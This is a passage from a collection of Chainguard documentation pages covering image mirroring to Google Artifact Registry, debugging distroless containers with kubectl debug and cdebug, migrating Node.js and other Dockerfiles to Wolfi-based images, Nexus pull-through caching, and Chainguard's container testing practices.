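# Sketch: resolve the current digest for a tag so it can be pinned in a
# Dockerfile or manifest using the tag@digest format shown above.
crane digest cgr.dev/chainguard/wolfi-base:latest
# Example reference built from the output:
#   cgr.dev/chainguard/wolfi-base:latest@sha256:<digest from the command above>
```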
--- ### Mirror new Containers to Google Artifact Registry with Chainguard CloudEvents URL: https://edu.chainguard.dev/chainguard/administration/cloudevents/image-copy-gcr/ Last Modified: March 7, 2025 Tags: Product, CloudEvents, Procedural Certain interactions with Chainguard resources will emit CloudEvents that you or an application can subscribe to. This allows you to do things like receive alerts when a user downloads one or more of your organization’s private container images or when a new image gets added to your organization’s registry. This tutorial is meant to serve as a companion to the Image Copy GCP example application. It will guide you through setting up infrastructure to listen for push events on an organization’s private registry and mirror any new Chainguard Containers in the registry to a GCP Artifact Registry repository. Prerequisites To follow along with this guide, it is assumed that you have the following set up and ready to use. A verified Chainguard organization with a private Registry and access to Production Containers. chainctl, the Chainguard command-line interface. You can install this by following our guide on How to Install chainctl. terraform to configure a Google Cloud service account and IAM permissions, and to deploy the Cloud Run service. A Google Cloud account with a project running. The example application assumes that your project has the following APIs enabled: Artifact Registry API Cloud Run Admin API The gcloud CLI installed on your local machine. You’ll need this to authenticate to Google Cloud over the command line. Setting up the Terraform configuration You can find all the code associated with this sample application in our Platform Examples repository on GitHub. To set up the sample application, you can create a Terraform configuration file and apply it to set up the necessary resources. To begin, create a new directory to hold the configuration and navigate into it. mkdir ~/gcp-example && cd $_ From within the gcp-example directory, you can begin creating a Terraform configuration named main.tf. This configuration will consist of a single module. For the purposes of this example, we will call it image-copy. This module’s source value will be the iac folder from the application code in the examples repository. module "image-copy" { source = "github.com/chainguard-dev/platform-examples/image-copy-gcp/iac" The next five lines configure a few variables that you will need to update to reflect your own setup. First, the configuration defines a name value. This will be used to prefix resources created by this sample application where possible. Next, it specifies the GCP project ID where certain resources will reside, including the container image for this application (along with mirrored images), the Cloud Run service hosting the application, and the Service Account that authorizes pushes to the Google Artifact Registry. Following that, the configuration specifies the Chainguard IAM organization from which we expect to receive events. This is used to authenticate that the Chainguard events are intended for you, and not another user. Container images pushed to repositories under this organization will be mirrored to Artifact Registry. You can find the names of every organization you have access to by running chainctl iam organizations list -o table. The next line specifies the location of the Artifact Registry repository and the Cloud Run subscriber.
The final line defines the dst_repo value, which is used to create a name for the repository in the Artifact Registry where container images will be mirrored. As an example, if the name value you specify is chainguard-dev and the dst_repo value is mirrored (as shown in the following example), any pushes to cgr.dev/<organization>/foo will be mirrored to <location>-docker.pkg.dev/<project_id>/chainguard-dev-mirrored. Be sure to include a closing curly bracket after the final line. name = "chainguard-dev" project_id = "<project-id>" group_name = "<organization-name>" location = "us-central1" dst_repo = "mirrored" } You can create this file with a command like the following. cat > main.tf <<EOF module "image-copy" { source = "github.com/chainguard-dev/platform-examples/image-copy-gcp/iac" name = "chainguard-dev" project_id = "<project-id>" group_name = "<organization-name>" location = "us-central1" dst_repo = "mirrored" } EOF Make sure to replace the placeholders with your own settings for project_id and group_name. In the next section, we’ll see how to apply the configuration to get the application up and running. Applying the configuration The Terraform configuration you created in the previous section will do all the work of setting up an events subscription for you. Specifically, it will build the mirroring application into a container image using ko_build and deploy the app to a Cloud Run service with permission to push to the Google Artifact Registry. It also sets up a Chainguard Identity with permissions to pull from the private cgr.dev repository, allows the Cloud Run service’s service account to assume the puller identity, and sets up a subscription to notify the Cloud Run service when pushes happen to cgr.dev. Before applying the configuration, you’ll need to log in to both the Chainguard platform with chainctl and GCP with gcloud. chainctl auth login gcloud auth login If you haven’t already done so, you will also need to acquire new access credentials to use as Application Default Credentials. You can do so with this command. gcloud auth application-default login Following that, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the file you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 8 to add, 0 to change, 0 to destroy. Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: yes . . . Apply complete! Resources: 8 added, 0 changed, 0 destroyed. Assuming all the resources were created as expected, you can observe the application in action. Testing the application If the terraform apply command you ran in the previous section was successful, the Terraform configuration will have set up a Cloud Run service to host the example application.
As mentioned previously, this application listens for registry.push events that occur on your organization’s repository; any time a new Container gets added to your organization’s Registry the application will mirror it to your GCP project’s Artifact Registry and into a repository named with the name and dst_repo values you set in your main.tf file. For example, if these values were chainguard-dev and mirrored, respectively, (as shown in the previous example) the mirror repository would be found at <location>-docker.pkg.dev/<project_id>/chainguard-dev-mirrored. You can find the results of the application in your GCP Project’s dashboard. Navigate to your GCP Project’s Artifact Registry, then click on the mirror repository you set up with Terraform. There, you will find any Chainguard Containers that have been added to your organization’s Registry since you deployed the application. This example shows a repository named chainguard-dev-mirrored with two images (node and python) mirrored into it. Be aware that just because the application is listening for registry.push events doesn’t mean any will occur automatically. Chainguard Containers are generally updated at least once every twenty four hours, so container images may not immediately appear in your mirror repository. Removing sample resources If you’d like to remove the resources you created with Terraform, you can run the terraform destroy command. terraform destroy This will destroy everything created in your Terraform configuration, including the Artifact Registry repository, the Service Account, and the Cloud Run service. You can then remove the working directory to clean up your system. rm -r ~/gcp-example/ Following that, all of the example resources created in this guide will be removed from your system. Learn more Chainguard emits more CloudEvents than just the registry:push events highlighted in this guide. We encourage you to check out our overview of Chainguard Events to learn the full breadth of event types that Chainguard generates. In addition, you may find it useful to explore the rest of our Administration resources to better understand how you can work with Chainguard’s products. --- ### Debugging Distroless Container Images with Kubectl Debug and CDebug URL: https://edu.chainguard.dev/chainguard/chainguard-images/troubleshooting/kubectl_cdebug/ Last Modified: May 22, 2024 Tags: Chainguard Containers, Product Tools used in this video kubectl cdebug Transcript So a while back I did a video on using Docker Debug to debug distroless containers. Docker Debug is fantastic, but you do need a Docker Desktop Pro license to take advantage of it. So I want to show a couple of other alternatives. First up we’re going to look at kubectl debug. So to the terminal. Okay, so the main reason tooling becomes important when debugging distroless containers is because there’s no shell in a distroless container. So you can’t just exec in to see what’s going on like you would with a debian or alpine container. And that means we need the tooling to do some extra work to make this possible. And normally that means creating a temporary container that shares the file and process namespaces with the target container. So let’s see how this looks with kubectl debug. So I have a kind cluster running locally. There’s no pods currently. But I have this nginx YAML which will start a cgr.dev/chainguard/nginx image. The container is called nginx but the pod is called nginx-pod. Okay so let’s try and get that running. Looks good. 
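The manifest itself is not shown in the transcript, but a minimal pod along the lines described (a pod named nginx-pod with a single container named nginx running the Chainguard nginx image) might look like the following sketch; the port is an assumption.

```sh
cat > nginx.yaml <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: nginx-pod
spec:
  containers:
  - name: nginx
    image: cgr.dev/chainguard/nginx
    ports:
    - containerPort: 8080   # assumed; the Chainguard nginx image listens on a non-privileged port
EOF
kubectl apply -f nginx.yaml
```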
Okay now say we want to debug this pod. Maybe it’s throwing an error or displaying the wrong text etc. So if it was a regular container you’d expect to do something like this. But because it’s distroless we get /bin/sh no such file directory. And that’s where kubectl debug comes in. So I can run a command like this. And what we’re saying is kubectl debug -it for interactive terminal. Then we give it the image. The image is the debug container image. So typically you want something with a shell and you’re able to install more debugging tools. So in this case we said alpine. We’ve then given it the name of the pod so the nginx-pod but also the container we’re interested in. So this one’s caught me out a few times. You do want to pass --target and the name of the container you need so that you get access to the target container namespace or process namespace. Okay so I run that. Okay I’ve got a shell and if I run ps I see the nginx processes. So that’s excellent and it looks like it’s all worked. Unfortunately it’s not as easy as that. So if I do ls I see a container file system but this isn’t the file system for my target container. It’s the file system for the debug container. Yep so we’re in an alpine container at the minute. And say I want to debug this /etc/nginx/nginx.conf file. Well that’s not in this container it’s in the target container. Now I can or should be able to get to that namespace via the proc file system. I get permission denied which you might think is odd because I am root but this is to do with namespaces and permissions and things not being quite as they seem in containers. So I can’t actually access the container file system in this case. And there’s actually a second problem as well. If I was to run this pod again and we’re going to call it pod 2 and this time we’ve got security context that says you can’t run continuous as root. Now you can probably guess what the problem is going to be here. So I’ll start with the second pod and if we try to do this the exact same command as did before well it’s going to pause for a while and then eventually it should give me a warning but it never actually connects to the container because of this rule of not running as root which of course the alpine container wants to run as root by default. Okay so there’s a second issue there and they’re both kind of related issues. What you really want to do in this case is run your containers not as the root user but as different user – as the Chainguard nginx image runs. So the Chainguard nginx defines a non-root user that’s running that and that’s you know security best practice. And what we want is we want our debug container to also run as the same user. So how can we do that? So in this case we’ve used alpine image but we can change to use a different image. So I could also create a dockerfile and with a USER statement it changes the user. Unfortunately there’s no --user command to pass to kubectl debug which would be really useful but what I can do is use not the nginx latest image but the latest-dev image. The latest-dev image includes a shell and package manager so I can use this as a as a good debugging image. I’m also sure it’s gonna have the same user because it’s just a variant of the nginx image. Okay so hopefully this will work. Yes so now I am in the container. I run ps. Yes I see the nginx processes. Now again I still need to figure out where the file system is. 
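For reference, the two kubectl debug invocations described here look roughly like the following sketch; the pod and container names match the demo, and the exact output will differ.

```sh
# Ephemeral debug container based on alpine; --target shares the target
# container's process namespace (the flag that is easy to forget).
kubectl debug -it nginx-pod --image=alpine --target=nginx

# The same command, but using the nginx:latest-dev variant so the debug
# container runs as the same non-root user as the target container.
kubectl debug -it nginx-pod --image=cgr.dev/chainguard/nginx:latest-dev --target=nginx

# From inside the debug container, the target's files are typically reachable
# through procfs once the users match, for example:
# cat /proc/1/root/etc/nginx/nginx.conf
```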
Oh of course I’ve got my development image so this file exists but I’m still in the debug container I’m not in the proper container namespace but I can get there. There you go. So that’s the actual nginx.conf from my target container. Okay so to fix both of those problems with kubectl debug what we did was we started a container that runs as the same user. So yeah top tip there and the other top tip is remember this target command. That’s the two things that trip me up with kubectl debug. kubectl debug does have a couple more powerful things that I’m not going to go through now but I do want to mention what I thought was particularly useful is it has a --copy command so you can create a copy of a container and modify that to see what’s going on with how affecting your production image. So that’s quite cool. The other tool I want to show you is cdebug by Ivan Velichko and I also want to say thanks to Ivan as it was a conversation with him that inspired this video and helped me understand the user problems with kubectl debug. So we still have our kubectl pods running and we’re going to try accessing them with cdebug. Here we’re saying exec -it so interactive terminal as per usual but we’ve added this --privileged flag that cdebug accepts and we’re targeting the Kubernetes pod nginx pod and the container nginx inside. Okay and that’s worked straight away so that’s great. We can see the processes as before but we can also access the file system and if we take a look to leave out the slash and we can even edit files in the file system because we’re privileged in this case. Let’s put blank space in so we don’t break anything. Okay so that’s even better we can see the file system we can see the processes and can even change files and play with things. But what happens if we try it with our other pod? So we’ve got this nginx-pod2. Well it does kind of work but because we can’t run as root it changes to the user 1000 which makes sense. But I don’t want to do that in this case what we’re going to do is pass --user so cdebug does take a --user flag and in this case we can use it to set our user to the same user as the container. Okay so that’s worked and we haven’t got any warnings about user. Type ps I can still see my processes. Now what happens if I access the file system this time? Looks like I can’t see it but if I open the file, no I put a slash in my mistake. So I can look at the file but in this case I can’t edit it. But still a pretty good result all I had to do is pass the --user flag. Okay so that was both cdebug and kubectl debug which are both great utilities for debugging distroless containers. Please do try them out and let me know how you get on. Thank you. --- ### How to Migrate a Node.js Application to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/node-images/ Last Modified: April 25, 2024 Tools used in this video Docker Resources Tutorial on Porting a Sample Application Example Application Git repository with code used in demo Transcript Today, we’re going to look at how easy it is to port a Dockerfile for a Node.js application to use a Chainguard Container base and how it can help improve the image, especially in terms of security. I’ll be using the free tier of Chainguard Containers here, so you can do everything in this video yourself today. OK, over to the terminal. So I have a directory here with a simple Node.js application. I think the first thing we should do is just see it running so you understand what it does. 
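As a rough sketch of the request the demo makes next (the /monster route and the size parameter are assumptions based on the narration, not taken from the repository):

```sh
# Ask the running service for an identicon and save it as a PNG.
curl -o lisa.png "http://localhost:8080/monster/lisa?size=100"
```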
OK, so it’s running on port 8080. If I do a curl, what we’re going to do is curl port 8080. We’re going to hit the monster endpoint and give it some input and a size. And what you’ll see is we get an image back. So basically, it produces like an identicon, if you know what an identicon is, or a unique avatar for its input. So if I give it an input, so I’ll give my manager Lisa’s name here, and you get the appropriate avatar out. So we can put in anything we like here. And if you put the same thing in again, you should get the same thing back out. And it’s sometimes used as a default image for users on a website, such as GitHub. OK, so let’s take a look at the Dockerfile for this application. You can see that it uses the Node official image from Docker Hub. It installs quite a few dependencies that are needed for the graphics capability, creates a non-root user, copies over the package JSON, and installs some Node modules. Then it copies over the code, changes to the dnmonster user, and calls npm start. So that all makes sense. Let’s have a go at building it. And that was all cached, so that was really fast. But let’s have a look at what it’s built. So that image is 1.22 gigabytes in size. So it’s a pretty large image. If we run it through Docker Scout, to look at the CVEs. I tend to use Docker Scout. It has quite nice summary output. But you can, of course, use Grype or whatever, et cetera. And what it’s telling me is this image has two high, seven medium, and 109 low CVEs. It is saying that I can change to the slim image, and I will reduce that to three medium and 24 low vulnerabilities. But we’re not going to do either of that. We’re going to change to use a Chainguard Container and see how that affects things. So I’m going to use the Chainguard registry here at cgr.dev. And we’re going to use the latest-dev image. So there’s a couple of things here. I’m using a Chainguard registry. I could also use the Docker Hub. So Chainguard Containers are available on the Docker Hub, just in the Chainguard user or namespace. But in this case, we’re using the Chainguard registry. For free, we provide the latest and latest-dev images. The difference between the latest and latest-dev is latest-dev includes a package manager and a shell, which I’m going to need in this case to install some dependencies. Now, these dependencies are all apt-get based. And Chainguard Containers, we have APK tools. We’re not an Alpine distribution, we use our own Linux distribution called Wolfi. But we do also use the APK tools. So first thing I’m going to do is switch this line to be the equivalent in Wolfi. So first thing you do is change to the root user so I can install software. So the Chainguard Containers typically do not run as root by default. And then I’m going to use APK add to install our software. And you can see the fairly similar package names to the app packages. We’ve got Cairo here. We’ve got Cairo there, for example, and libjpeg, et cetera, et cetera. But they are slightly different names. OK. Then what do I need to do? So the next part is the groupadd. So again, that’s typically different in Wolfi images as we generally use the BusyBox tools. So that’s not groupadd. It’s addgroup. So this line is going to change to look like that. install can remain the same. We do have another difference down the bottom, though. This npm start. So because Chainguard Containers by default don’t have a shell, this doesn’t work. Basically, this will get passed to the node binary to be interpreted, which isn’t what we want. 
So what I’m going to do is change this to be an entrypoint command. And then I know it’s not going to be passed as an argument to the node binary. And that should work. Let’s try building it. This time we’ll call it dnmonster-cg. Again, it was cached, so that was pretty fast. If I can spell. And now this time it’s 880 megabytes. So that’s, what, 340 megabytes saving, which is pretty good. But more interestingly, what’s happened to the CVEs? Yeah, there’s no CVEs in this image. So that’s a very big jump and great to see. I would say 880 megabytes is still quite a large image. So let’s see if we can get it down a bit further. And what we can do is we can change to use a multi-stage build. So here everything is getting installed in this node latest-dev image. And we even have things like a C compiler in this image, which we don’t really want in our final production image. So what we’re going to do is we’re going to change to use a multi-stage build. First thing I’m going to do is call this the build stage. And then we’re going to have a second stage where we copy the assets out of this image and into the production image. And I’m just going to copy one I made before. So here we’re using wolfi-base. I can’t use the Node latest image because we need to install these dependencies. So for that reason, I’ve used wolfi-base. So this image will end up with a package manager and a shell in it. But it’s still a lot smaller than the latest-dev image because we don’t have things like a C compiler and other build tooling in there. Note that I did have to add nodejs to this list to explicitly install Node.js. But otherwise, we’re just copying over the build assets from the previous stage and setting the entrypoint. We no longer have NPM, so I’ve explicitly set it to call Node with server.js. OK, so let’s try building this one. We call it multi, if I can spell. OK, again, that was cached, so that’s been fast. Right, now we’re down to 334 megabytes, so a much better size. And just for the sake of checking, we should also run it through Docker Scout. I hope we’ve not somehow managed to add in vulnerabilities. We shouldn’t have. Yeah, there’s no vulnerability, so that’s great. But there is still a problem with this image. So let’s try running it. It should still work. So there’s Lisa’s avatar again. But if I try and stop this, so docker stop 12386, it hangs. And that’s not great. And the reason it’s hanging is because the Node binary doesn’t handle signals properly, or isn’t set up to handle signals properly. And basically, the Docker sends a SIGTERM to the container. It doesn’t respond to the SIGTERM, so a few seconds later, it sends a SIGKILL. And that’s not really what you want for a clean shutdown. So what we’re going to do is we’re going to add a tool called tini, which is basically an init system to this image. And we’re going to add that to the entrypoint as well. So now the PID 1 in this container isn’t going to be Node, it’s going to be tini. And tini will take care of handling signals and also reaping children and things like that. OK, so if we run this again. We need to build it first. And if we run it again, should still work. Yes. But this time, if I do docker stop 1ad2, it stops immediately because tini has correctly handled the signals. OK, so that’s pretty much all I have. We’ve seen how moving a Node application to Chainguard Containers can significantly reduce the size of the image and completely cut the CVE count in the image. Please do give this a try and let me know how you get on. 
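Putting the steps from the video together, the final multi-stage Dockerfile might look roughly like the following sketch. The package names, user name, and file layout are assumptions based on the narration; see the linked example repository for the exact version used in the demo.

```sh
cat > Dockerfile <<'EOF'
# Build stage: the -dev variant includes a shell, apk, and build tooling.
FROM cgr.dev/chainguard/node:latest-dev AS build
USER root
# Graphics libraries needed to build the native dependencies (names assumed).
RUN apk add --no-cache cairo-dev pango-dev libjpeg-turbo-dev
WORKDIR /app
COPY package.json ./
RUN npm install
COPY . .

# Runtime stage: wolfi-base plus only the runtime packages we need.
FROM cgr.dev/chainguard/wolfi-base
RUN apk add --no-cache nodejs cairo pango libjpeg-turbo tini && \
    addgroup dnmonster && adduser -D -G dnmonster dnmonster
WORKDIR /app
COPY --from=build /app /app
USER dnmonster
EXPOSE 8080
# tini runs as PID 1 and forwards signals to node, so "docker stop" exits cleanly.
ENTRYPOINT ["tini", "--", "node", "server.js"]
EOF
docker build -t dnmonster-multi .
```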
--- ### How to Set Up Pull Through from Chainguard's Registry to Nexus URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/nexus-pull-through/ Last Modified: August 19, 2024 Tags: Product, Chainguard Containers Organizations can use Chainguard Containers along with third-party software repositories in order to integrate with current workflows as the single source of truth for software artifacts. In this situation, you can set up a proxy repository to function as a mirror of Chainguard’s registry. This mirror can then serve as a pull through cache for your Chainguard Containers. This tutorial outlines how to set up a repository with Sonatype Nexus. Specifically, it will walk you through how to set up one repository you can use as a pull through cache for Chainguard’s public Starter containers or for Production containers originating from a private Chainguard repository. Prerequisites In order to complete this tutorial, you will need the following: Administrative privileges over a Nexus instance. If you’re interested in testing out this configuration, you can either download a trial from Sonatype’s website or run it as a Docker container. Note: If you use the Docker solution, you will need to add an extra port for the repository to the docker run command. For example, if you run the repository on port 5051, you would use a command like docker run -d -p 8081:8081 -p 5051:5051 --name nexus sonatype/nexus3 instead of the example given in the linked GitHub overview. Privileges to create a pull token on a Chainguard registry. (For private Chainguard repository access) A spare port on the Nexus server to serve the repository (Nexus limits you to 20 ports), or an alternative solution — such as a reverse proxy — which is beyond the scope of this guide. Setting up Nexus as a pull through for Starter containers Starter container images are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Nexus from which you can pull Starter containers, log in to Nexus with an admin account. Once there, click on the Administration mode cog in the top bar, click Repository in the left-hand navigation menu, and then select Repositories. On the Repositories page, click the Create Repository button and select the docker (proxy) Recipe. Following that, you can enter the following details for your new remote repository: Name — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name chainguard. Remote storage — This must be set to https://cgr.dev/. HTTP[S] port — Choose an HTTP or HTTPS port as appropriate for your setup. Following that, click the Create repository button at the bottom of the page. If everything worked as expected, you’ll be taken back to the repository list and should now see an extra repository with your chosen name, with type “proxy”. Your Nexus URL is the hostname of the Nexus server and the port number you chose; for example, myrepo.local:5051. If your Nexus server is running from a Docker container, your Nexus URL would be something like localhost:5051. Testing pull through of a Starter container If your setup requires authentication, log in with a valid Nexus username and password: docker login -u<user> <Nexus URL> After running this command, you’ll be prompted to enter a password. After running the docker login command, you will be able to pull a Starter container image through Nexus.
The following example pulls the wolfi-base container image: docker pull <Nexus URL>/chainguard/wolfi-base Be sure the docker pull command contains the correct Nexus URL for your repository. Setting up Nexus as a pull through for Production containers Production Chainguard Containers are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up a Nexus repository that you can use as a pull through cache for Production images is similar to the one outlined previously for Starter containers, but with a few extra steps. To get started, you will need to create a pull token for your organization’s registry. Pull tokens are longer-lived tokens that can be used to pull containers from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Nexus. Follow the instructions in the link above to create a pull token and take note of the values for username and password, as you’ll need these to configure a repository for pulling through Production container images. You can edit the existing repository, in which case all your users will have access to the private images. Alternatively, you could create a new chainguard-private repository exactly as before but with restricted access, though restricting access to repositories in Nexus is beyond the scope of this guide. At the bottom of the configuration screen there will be an HTTP section. Check the Authentication box and use the “Username” Authentication type. Enter the username and password from the pull token in the respective fields. Click the Save button to apply the changes. Testing pull through of a Production container image If your setup requires authentication, log in with a valid Nexus username and password: docker login -u<user> <Nexus URL> After running this command, you’ll be prompted to enter a password. After running the docker login command, you will be able to pull Production container images through Nexus. If your organization has access to it, the following example will pull the chainguard-base container image: docker pull <Nexus URL>/<company domain>/chainguard-base Be sure the docker pull command you run includes the name of your organization’s registry. Debugging pull through from Chainguard’s registry to Nexus If you run into issues when trying to pull Containers from Chainguard’s Registry to Nexus, please ensure the following requirements are met: Ensure that all Containers network requirements are met. When configuring a remote Nexus repository, ensure that the URL field is set to https://cgr.dev/. This field must not contain additional components. You can troubleshoot by running docker login from another node (using the pull token credentials) and trying to pull a container image from cgr.dev/chainguard/<image name> or cgr.dev/<example.com>/<image name>, using your own organization’s registry name in place of <example.com>; a sketch of this check appears at the end of this article. It could be that your Nexus repository was misconfigured. In this case, create and configure a new Nexus repository to test with. Learn more If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by checking out our Containers documentation. If you’d like to learn more about Sonatype Nexus, we encourage you to refer to the official Nexus documentation.
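For the troubleshooting step mentioned above, the direct pull that bypasses Nexus might look like the following sketch, using the pull token credentials created earlier.

```sh
# Log in to Chainguard's registry directly with the pull token credentials,
# then pull an image your organization is entitled to. If this succeeds but
# pulling through Nexus fails, the Nexus repository configuration is at fault.
docker login -u "<pull-token-username>" cgr.dev
docker pull cgr.dev/<example.com>/chainguard-base
```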
--- ### Migrating Dockerfiles to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migrating-to-chainguard-images/ Last Modified: March 25, 2024 Tags: Chainguard Containers, Product Based on the Wolfi Linux undistro, Chainguard Containers have special features designed for increased security and provenance attestation. Depending on your current base image and custom commands, you may need to make some adjustments when migrating your current Dockerfile workloads to use Chainguard Containers. A general migration process would involve the following steps: Identify the base image you need. Check out the Chainguard Containers Directory to identify the image that is the closest match to what you currently use. You may also use wolfi-base as a flexible starting point for your experimentation. Try the -dev variant of the image first. Chainguard Containers typically have a distroless variant, which is very minimal and doesn’t include apk, and a dev variant that contains tooling necessary to build applications and install new packages. Start with the dev variant or the wolfi-base image to have more room for customization. Identify packages you need to install. Depending on your current base image, you may need to include additional packages to meet dependencies. Refer to the Searching for Packages section for more details on how to find packages. Migrate to a distroless image. Evaluate the option of using a Docker multi-stage build to create a final distroless image containing only what you need. Check the Getting Started with Distroless images for more details of how to work with distroless images. Although not required, this process should give you a smaller image with additional safeguards. There are some differences in Wolfi’s busybox and coreutils packages when compared to their counterparts in distros such as Debian or even Alpine. Some binaries and scripts are not included by default, which contributes to a smaller package size. This was done in order to keep images to a minimum, but be aware that some commands might still be available through separate packages. The next sections of this page contain distro-specific information that should help you streamline the migration process from your current base images to Chainguard images. Migrating from Debian and Ubuntu Dockerfiles Chainguard Containers use the apk package format, which differs from the Debian-based apt in several ways. Some of these features contribute in making packages smaller and more accountable, resulting in smaller images with traceable provenance information based on cryptographic signatures. The page Why apk from the official Wolfi documentation explains in more detail why we use apk. If you are coming from a Debian-based Dockerfile, you’ll need to adapt some of your commands to be compatible with the apk ecosystem: Command Description Debian-based Dockerfile Wolfi-based Equivalent Install a package apt install apk add Remove a package apt remove apk del Update package manager cache apt update apk update Our Debian Compatibility page has a table listing common tools and their corresponding package(s) in both Wolfi and Debian distributions. For Ubuntu-based Dockerfiles, check our Ubuntu Compatibility page. Migrating from Red Hat UBI Dockerfiles If you are coming from a Red Hat UBI (Universal Base Image) Dockerfile, you’ll also need to adapt some of your commands to be compatible with the apk ecosystem. 
Wolfi uses BusyBox utilities, which offer a smaller footprint compared to GNU coreutils in Red Hat images. Our Red Hat Compatibility page has a table listing common tools and their corresponding package(s) in both Wolfi and Red Hat distributions. The following table lists common package management commands and their Wolfi-based equivalents: Command Description Red Hat UBI Dockerfile Wolfi-based Equivalent Install a package yum install apk add Remove a package yum remove apk del Update package manager cache yum makecache apk update Migrating from Alpine Dockerfiles If your Dockerfile is based on Alpine, the process for migrating to Chainguard Containers should be more straightforward, since you’re already using apk commands. Wolfi packages typically match what is available in Alpine, with some exceptions. For instance, the Wolfi busybox package is slimmer and doesn’t include all tools available in Alpine’s busybox. Check the Alpine Compatibility page for a list of common tools and their corresponding packages in Wolfi and Alpine. Be aware that binaries are not compatible between Alpine and Wolfi. You should not attempt to copy Alpine binaries into a Wolfi-based container image. Searching for Packages Packages from Debian and other base distributions might have a different name in Wolfi. To search for packages, log into an ephemeral container based on cgr.dev/chainguard/wolfi-base: docker run -it --rm --entrypoint /bin/sh cgr.dev/chainguard/wolfi-base Then, run apk update to update the local apk cache with the latest Wolfi packages: apk update You’ll get output similar to this: fetch https://packages.wolfi.dev/os/x86_64/APKINDEX.tar.gz [https://packages.wolfi.dev/os] OK: 46985 distinct packages available Now you can use apk search to look for packages. The following example searches for PHP 8.2 XML extensions: apk search php*8.2*xml* You should get output similar to this: php-8.2-simplexml-8.2.17-r0 php-8.2-simplexml-config-8.2.17-r0 php-8.2-xml-8.2.17-r0 php-8.2-xml-config-8.2.17-r0 php-8.2-xmlreader-8.2.17-r0 php-8.2-xmlreader-config-8.2.17-r0 php-8.2-xmlwriter-8.2.17-r0 php-8.2-xmlwriter-config-8.2.17-r0 php-simplexml-8.2.11-r1 php-xml-8.2.11-r1 php-xmlreader-8.2.11-r1 php-xmlwriter-8.2.11-r1 Searching which package has a command To search in which package you can find a command, you can use the syntax apk search cmd:command-name. For instance, if you want to discover which package has the command useradd, you can use: apk search cmd:useradd You’ll get output indicating that the shadow package has the command you are looking for. shadow-4.15.1-r0 Searching for package dependencies To check for package dependencies, you can use the syntax apk info -R package-name. For example, to list the dependencies of the shadow package that we’ve seen in the previous section, you can run: apk info -R shadow And this will give you a list of dependencies for each version of the shadow package currently available: ... shadow-4.15.1-r0 depends on: so:ld-linux-x86-64.so.2 so:libbsd.so.0 so:libc.so.6 so:libcrypt.so.1 so:libpam.so.0 so:libpam_misc.so.0 Searching for packages that include a shared object To search which packages include a shared object, you can use the syntax apk search so:shared-library.
As an example, if you want to check which packages include the libxml2 shared library, you can run something like: apk search so:libxml2.so* And this should give you output indicating that this shared object is included within the libxml2-2.12.6-r0 package. For detailed information about apk options and flags when searching for packages, check the official documentation. Resources to Learn More Our Getting Started Guides have detailed examples for different language ecosystems and stacks. Make sure to also check image-specific information in our Chainguard Containers Directory. If you can’t find an image that is a good match for your use case, or if your build has dependencies that cannot be met with the regular catalog, get in touch with us for alternative options. --- ### How Chainguard Containers are Tested URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-testing/ Last Modified: April 7, 2025 Tags: Overview, Chainguard Containers, Product Chainguard Containers are minimal, distroless container images that you can use to build and run secure applications. Given the importance of secure, highly performant images, Chainguard performs testing to ensure our container images match the functionality of upstream and other external counterparts. This article provides a high-level overview of Chainguard’s approach to testing when building new container images to ensure their security and consistency with comparable container images. Build requirements for new container images Chainguard has a set of requirements in place that new container images must meet in order to be included in our Containers Directory. These requirements fall into two categories: Container image standards Application testing Container image standards When building a new container image, Chainguard will take steps to ensure it meets the following standards: Requirement Explanation Size Any new Chainguard Containers should be smaller than their external counterparts, though exceptions may occur. CVEs When scanned with a CVE scanning tool like Grype, new container images should return zero CVEs. If a container image does return CVEs in its scan results, it should include an explanation, though some reported CVEs may be false positives. Refer to our Security Advisories for more information. Kubernetes accessibility Containers used for Kubernetes-based deployments must be able to run inside of a Kubernetes cluster. Architecture Chainguard Containers must be built for both the x86_64 and aarch64 architectures. Application testing Chainguard performs the following checks on new container images to ensure that the applications contained within them meet the needs of most use cases: Requirement Explanation Functionality The application is tested to confirm that it complies with its upstream counterpart’s core feature set. Builder Containers Chainguard’s builder containers are verified to build new, functional container images. Automated tests In addition to the container image build requirements outlined previously, Chainguard also performs a number of automatic checks for new container images as part of our CI/CD process. Depending on the container image, Chainguard performs various representative tests, such as functional and integration tests. For example, for applications primarily deployed with a Helm chart, the container image is deployed to an ephemeral Kubernetes cluster using the accepted Helm chart, which is validated in various ways. When applicable, Chainguard will develop functional tests for container images.
These tests vary by application, but can generally be thought of as integration tests that run after a container image is built but before it gets tagged. Our goal for these tests is that they fully evaluate the container image’s deployment in a representative environment; for example, container images running Kubernetes applications are tested in a Kubernetes cluster and builder or toolchain applications are tested with a docker run command or part of a docker build process. This means that our container images work with the existing upstream deployment methods, such as Helm charts or Kustomize manifests, helping us to ensure that a container image is as close to a drop-in replacement as possible. Additionally, Chainguard performs automated tests on every package included in our container images. These tests run on every new build within an ephemeral container environment before the build is published. This allows us to validate the representative functionality of each package. Learn more Chainguard’s rigorous container image testing standards and frequent updates ensure that they will work as expected with few (and often zero) vulnerabilities. If you’re having trouble working with a specific Chainguard Container, we encourage you to check out its relevant Overview page in our Chainguard Containers Directory. For general help with using Chainguard Containers, you can refer to our Debugging Distroless Container Images guide or our Chainguard Containers FAQs. For help with specific issues or questions not covered in these resources, please contact our support team. --- ### Verifying Chainguard Containers and Metadata Signatures with Cosign URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/verifying-chainguard-images-and-metadata-signatures-with-cosign/ Last Modified: June 5, 2025 Tags: Chainguard Containers, Product All Chainguard Containers contain verifiable signatures and attestations such as SBOMs 